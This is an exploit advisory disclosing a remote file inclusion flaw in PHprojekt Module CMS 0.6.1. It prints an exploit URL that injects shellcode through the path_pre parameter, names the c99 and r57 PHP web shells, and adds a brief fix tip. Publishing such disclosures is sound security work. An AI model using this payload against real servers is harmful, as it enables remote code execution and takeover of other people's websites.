==============================================================
          PHprojekt Module CMS 0.6.1 Remote File Inclusion Vulnerability
          ==============================================================


 
 [~] Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com

 [~] Vendor: http://www.mariovaldez.net/

 [~] Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.zip



 .:: SOH-Crew Website: www.soh-crew.it.tt ::.


 Greetings: TheJT, Mario, Enrico, Dirk, x0r_32, GolD_M, SecurityFocus-Team and EAB


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


 [+] Exploit: http://[somehost]/cm/cm_navigation.inc.php?path_pre=[SHELLCODE]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Description: The $path_pre parameter in file cm_navigation.inc.php isn't declared before
             include_once and no .htaccess-file is about it. So an attacker can execute
             some php-shellcode (c99 or r57 for example) about it.



Fixtip for users: Please declare the $path_pre parameter or use Hacking-Attempt!



#### The 21 years old, german Hacker bd0rk #### <= white-hat :-)